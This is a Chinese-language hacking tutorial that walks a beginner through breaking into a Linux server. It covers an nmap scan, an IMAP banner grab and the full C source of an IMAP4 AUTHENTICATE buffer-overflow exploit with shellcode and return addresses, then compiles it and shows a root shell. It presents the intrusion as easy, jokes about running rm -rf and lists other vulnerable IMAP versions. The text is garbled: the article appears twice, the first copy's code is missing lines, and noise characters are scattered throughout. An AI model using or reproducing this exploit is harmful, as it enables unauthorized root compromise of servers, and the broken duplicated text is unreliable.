一次利用imap漏洞的入侵
一次利用imap漏洞的入侵
作者 : geniusbb
email : geniusbb@hotmail.com
系统 : Linux
以下文章是菜鸟写给菜鸟交流的 ,高手就免看了,欢迎来信交换心得 。
[cracker@ns2:~/ ] nmap -sF -O victim.com ( 用扫描工具如nmap 扫描主机上开放的端口和服务。)
Port State Protocol Service
21 open tcp ftp
23 open tcp telnet
25 open tcp smtp
53 open tcp domain , _0 l. L$ H/ J
80 open tcp http
81 open tcp hosts2-ns
110 open tcp pop-3
143 open tcp imap
[cracker@ns2:~/ ]telnet victim.com 143 ( imap 很可疑, telnet 上去看看 imap ) k# y w1 n) `& w
版本 )
* OK victim.com IMAP4rev1 v10.190 server ready ( 咦, 版本 10.190
imap.c
[cracker@ns2:~/ ] more imap.c
/* Ultimate IMAP4 sploit coded by The Tekneeq Crew */
/* http://www.attrition.org/hosted/tekneeq */
#include <stdio.h>
#include <stdarg.h>
#include <unistd.h>
#include <sys/time.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <netdb.h>
#define RET_POS 1028
int connect_tcp(struct in_addr addr,unsigned short port);
int fdprintf(int dafd,char *fmt,...);
char *name;
unsigned long ret_addr;
};
struct types types[]={
{"IMAP4rev1 9.0",0xbffff6e4},
{"IMAP4rev1 v10.190",0xbffff30f},
{"IMAP4rev1 v10.223",0xbffff6e4},
{"IMAP4rev1 v10.203",0xbffff30f},
{"IMAP4 Service 8.3",0xbffff724},
{NULL,0}
};
char overflow_buff[4096];
struct in_addr victim;
/* standard shellcode with a few modifications */
char hellcode[]=
"\xeb\x35\x5e\x80\x46\x01\x30\x80\x46\x02\x30\x80\x46\x03\x30"
"\x80\x46\x05\x30\x80\x46\x06\x30\x89\xf0\x89\x46\x08\x31\xc0" 3 U! k- F) R4 o% w
"\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56"
"\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xc6\xff\xff\xff"
{
unsigned long *ret;
char recvbuf[1024];
int sockfd;
int i,n=0;
if (argc < 2)
{
printf("Usage: %s <hostname> [offset]\n",argv[0]);
exit(0);
}
if (!host_to_ip(argv[1],&victim))
{
fprintf(stderr,"Hostname lookup failure\n");
exit(0);
}
memset(overflow_buff,0x90,4096);
for (i=RET_POS-(strlen(hellcode));i<RET_POS;i++)
overflow_buff=hellcode[n++];
if ((sockfd=connect_tcp(victim,143)) < 0)
{
fprintf(stderr,"Error connecting to remote host\n");
exit(0);
}
n=read(sockfd,recvbuf,1024);
if (n <= 0) {
fprintf(stderr,"Connection closed\n");
exit(0);
}
printf("%s\n",recvbuf);
for (i=0;;i++)
{
if (types.name==NULL)
{
i=0;
break;
}
if (strstr(recvbuf,types.name))
break;
}
printf("Imap type %d\n",i);
ret=(unsigned long *)(overflow_buff+RET_POS);
*ret=types.ret_addr;
if (argv[2]) *ret+=(unsigned long)atoi(argv[2]);
overflow_buff[RET_POS+4]=0;
printf("Sending overflow\n");
fdprintf(sockfd,"* AUTHENTICATE {%d}\n",strlen(overflow_buff));
fdprintf(sockfd,"%s\r\n",overflow_buff);
read(sockfd,recvbuf,1024);
printf("Got shell\n");
RunShell(sockfd);
close(sockfd);
return;
}
void RunShell(int thesock)
{
int n;
char recvbuf[1024];
fd_set rset;
while (1)
{
FD_ZERO(&rset);
FD_SET(thesock,&rset);
FD_SET(STDIN_FILENO,&rset);
select(thesock+1,&rset,NULL,NULL,NULL);
if (FD_ISSET(thesock,&rset))
{
n=read(thesock,recvbuf,1024);
if (n <= 0)
{
printf("Connection closed\n");
exit(0);
}
recvbuf[n]=0;
printf("%s",recvbuf);
}
if (FD_ISSET(STDIN_FILENO,&rset))
{
n=read(STDIN_FILENO,recvbuf,1024);
if (n>0)
{
recvbuf[n]=0;
write(thesock,recvbuf,n);
}
}
}
}
int fdprintf(int dafd,char *fmt,...)
{
char mybuffer[4096];
va_list va;
va_start(va,fmt);
vsnprintf(mybuffer,4096,fmt,va);
write(dafd,mybuffer,strlen(mybuffer));
va_end(va);
return(1);
}
int connect_tcp(struct in_addr addr,unsigned short port)
{
struct sockaddr_in serv;
int thesock,flags;
thesock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
bzero(&serv,sizeof(serv));
memcpy(&serv.sin_addr,&addr,sizeof(struct in_addr));
serv.sin_port=htons(port);
serv.sin_family=AF_INET;
if (connect(thesock,(struct sockaddr *)&serv,sizeof(serv)) < 0)
return(-1);
else
return(thesock);
}
int host_to_ip(char *hostname,struct in_addr *addr)
{
struct hostent *res;
res=gethostbyname(hostname);
if (res==NULL)
return(0);
memcpy((char *)addr,res->h_addr,res->h_length);
return(1);
}
/* www.hack.co.za */
3 S+ a: f2 K7 `- C2 J3 d
[cracker@ns2:~/ ] gcc imap.c -o imap ( 编译 imap.c )
(运行imap: ./imap offset ip , offset 的数值可更改)
[cracker@ns2:~/ ] ./imap 0 victim.com
(运行./imap , 直到 spawn 到 一个 shell 为止。若成功反应如下)
* OK victim.com IMAP4rev1 v10.190 server ready
Imap type 1
Sending overflow
Got shell (有 shell 了)
# id ( 打 id 看看自己是谁)
入侵一架主机就那么容易 。只要找到主机上有漏洞的服务如 imap , qpop , rpc services ,
再找些exploit跑跑 ,那么入侵就机会成功。其他imap拥有一样的漏洞的版本是: (
IMAP4rev1 v10.233,10.205,10.203,10.196,10.166
这些漏洞都利用了 buffer overflow 缓冲溢出的原理 .
作者 : geniusbb
email : geniusbb@hotmail.com
系统 : Linux
以下文章是菜鸟写给菜鸟交流的 ,高手就免看了,欢迎来信交换心得 。
[cracker@ns2:~/ ] nmap -sF -O victim.com ( 用扫描工具如nmap 扫描主机上开放的端口和服务。)
Port State Protocol Service
21 open tcp ftp
23 open tcp telnet
25 open tcp smtp
53 open tcp domain , _0 l. L$ H/ J
80 open tcp http
81 open tcp hosts2-ns
110 open tcp pop-3
143 open tcp imap
[cracker@ns2:~/ ]telnet victim.com 143 ( imap 很可疑, telnet 上去看看 imap ) k# y w1 n) `& w
版本 )
* OK victim.com IMAP4rev1 v10.190 server ready ( 咦, 版本 10.190
?有漏洞的服务了,去找exploit) w
$ X% a6 b- b' n; r( K
[cracker@ns2:~/ ] ls ( imap.c 是从 www.hack.za.co 下的) 'imap.c
[cracker@ns2:~/ ] more imap.c
/* Ultimate IMAP4 sploit coded by The Tekneeq Crew */
/* http://www.attrition.org/hosted/tekneeq */
#include <stdio.h>
#include <stdarg.h>
#include <unistd.h>
#include <sys/time.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <netdb.h>
#define RET_POS 1028
int connect_tcp(struct in_addr addr,unsigned short port);
int fdprintf(int dafd,char *fmt,...);
void RunShell(int thesock);
struct types {char *name;
unsigned long ret_addr;
};
struct types types[]={
{"IMAP4rev1 9.0",0xbffff6e4},
{"IMAP4rev1 v10.190",0xbffff30f},
{"IMAP4rev1 v10.223",0xbffff6e4},
{"IMAP4rev1 v10.203",0xbffff30f},
{"IMAP4 Service 8.3",0xbffff724},
{NULL,0}
};
char overflow_buff[4096];
struct in_addr victim;
/* standard shellcode with a few modifications */
char hellcode[]=
"\xeb\x35\x5e\x80\x46\x01\x30\x80\x46\x02\x30\x80\x46\x03\x30"
"\x80\x46\x05\x30\x80\x46\x06\x30\x89\xf0\x89\x46\x08\x31\xc0" 3 U! k- F) R4 o% w
"\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56"
"\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xc6\xff\xff\xff"
"\x2f\x32\x39\x3e\x2f\x43\x38";
int main (int argc,char **argv){
unsigned long *ret;
char recvbuf[1024];
int sockfd;
int i,n=0;
if (argc < 2)
{
printf("Usage: %s <hostname> [offset]\n",argv[0]);
exit(0);
}
if (!host_to_ip(argv[1],&victim))
{
fprintf(stderr,"Hostname lookup failure\n");
exit(0);
}
memset(overflow_buff,0x90,4096);
for (i=RET_POS-(strlen(hellcode));i<RET_POS;i++)
overflow_buff=hellcode[n++];
if ((sockfd=connect_tcp(victim,143)) < 0)
{
fprintf(stderr,"Error connecting to remote host\n");
exit(0);
}
n=read(sockfd,recvbuf,1024);
if (n <= 0) {
fprintf(stderr,"Connection closed\n");
exit(0);
}
printf("%s\n",recvbuf);
for (i=0;;i++)
{
if (types.name==NULL)
{
i=0;
break;
}
if (strstr(recvbuf,types.name))
break;
}
printf("Imap type %d\n",i);
ret=(unsigned long *)(overflow_buff+RET_POS);
*ret=types.ret_addr;
if (argv[2]) *ret+=(unsigned long)atoi(argv[2]);
overflow_buff[RET_POS+4]=0;
printf("Sending overflow\n");
fdprintf(sockfd,"* AUTHENTICATE {%d}\n",strlen(overflow_buff));
fdprintf(sockfd,"%s\r\n",overflow_buff);
read(sockfd,recvbuf,1024);
printf("Got shell\n");
RunShell(sockfd);
close(sockfd);
return;
}
void RunShell(int thesock)
{
int n;
char recvbuf[1024];
fd_set rset;
while (1)
{
FD_ZERO(&rset);
FD_SET(thesock,&rset);
FD_SET(STDIN_FILENO,&rset);
select(thesock+1,&rset,NULL,NULL,NULL);
if (FD_ISSET(thesock,&rset))
{
n=read(thesock,recvbuf,1024);
if (n <= 0)
{
printf("Connection closed\n");
exit(0);
}
recvbuf[n]=0;
printf("%s",recvbuf);
}
if (FD_ISSET(STDIN_FILENO,&rset))
{
n=read(STDIN_FILENO,recvbuf,1024);
if (n>0)
{
recvbuf[n]=0;
write(thesock,recvbuf,n);
}
}
}
}
int fdprintf(int dafd,char *fmt,...)
{
char mybuffer[4096];
va_list va;
va_start(va,fmt);
vsnprintf(mybuffer,4096,fmt,va);
write(dafd,mybuffer,strlen(mybuffer));
va_end(va);
return(1);
}
int connect_tcp(struct in_addr addr,unsigned short port)
{
struct sockaddr_in serv;
int thesock,flags;
thesock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
bzero(&serv,sizeof(serv));
memcpy(&serv.sin_addr,&addr,sizeof(struct in_addr));
serv.sin_port=htons(port);
serv.sin_family=AF_INET;
if (connect(thesock,(struct sockaddr *)&serv,sizeof(serv)) < 0)
return(-1);
else
return(thesock);
}
int host_to_ip(char *hostname,struct in_addr *addr)
{
struct hostent *res;
res=gethostbyname(hostname);
if (res==NULL)
return(0);
memcpy((char *)addr,res->h_addr,res->h_length);
return(1);
}
/* www.hack.co.za */
3 S+ a: f2 K7 `- C2 J3 d
[cracker@ns2:~/ ] gcc imap.c -o imap ( 编译 imap.c )
(运行imap: ./imap offset ip , offset 的数值可更改)
[cracker@ns2:~/ ] ./imap 0 victim.com
(运行./imap , 直到 spawn 到 一个 shell 为止。若成功反应如下)
* OK victim.com IMAP4rev1 v10.190 server ready
Imap type 1
Sending overflow
Got shell (有 shell 了)
# id ( 打 id 看看自己是谁)
uid=0(root) gid=0(root) groups=0(root)
( 那么主机的命运就操纵在你手上了,你是 root 了, 来个 rm -rf 超度它?算了吧。)入侵一架主机就那么容易 。只要找到主机上有漏洞的服务如 imap , qpop , rpc services ,
再找些exploit跑跑 ,那么入侵就机会成功。其他imap拥有一样的漏洞的版本是: (
IMAP4rev1 v10.233,10.205,10.203,10.196,10.166
这些漏洞都利用了 buffer overflow 缓冲溢出的原理 .